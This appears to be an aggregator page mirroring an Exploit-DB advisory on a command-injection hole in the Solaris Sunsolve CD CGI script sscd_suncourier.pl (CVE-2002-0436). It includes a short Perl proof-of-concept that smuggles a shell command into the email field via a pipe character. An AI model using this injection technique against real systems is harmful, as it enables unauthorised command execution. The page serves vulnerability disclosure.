Lucene search
+L

Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution

🗓️ 11 Mar 2002 00:00:00Reported by FyodorType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Sunsolve CD CGI Script allows arbitrary command execution via unsanitized input submission.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-0436
11 Jun 200204:00
cve
cvelist
Cvelist
CVE-2002-0436
11 Jun 200204:00
cvelist
euvd
EUVD
EUVD-2002-0433
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-0436
26 Jul 200204:00
nvd
openvas
OpenVAS
SunSolve CD CGI user input validation
3 Nov 200500:00
openvas
openvas
OpenVAS
SunSolve CD CGI user input validation
3 Nov 200500:00
openvas
nessus
Tenable Nessus
Sun Sunsolve CD Pack sscd_suncourier.pl email Parameter Arbitrary Command Execution
6 Aug 200200:00
nessus
source: https://www.securityfocus.com/bid/4269/info

The Sunsolve CD is part of the Solaris Media pack. It is included as a documentation resource, and is available for the Solaris Operating Environment.

A CGI script included with the CD does not adequately sanitize input. Due to a design failure which does not remove special characters such as the pipe (|) character, a user submitting a malicious email address to the script could execute arbitrary commands with the permissions of the executing program.

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
ua = new LWP::UserAgent;
$ua->agent("Scrapers");
my $req = POST  'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl',
[
step =>  "submit" ,
emailaddr => "foo\@bar.com| id > /tmp/foo|"];
$res = $ua->request($req);
print $res->as_string;
print "code", $res->code, "\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.1187
37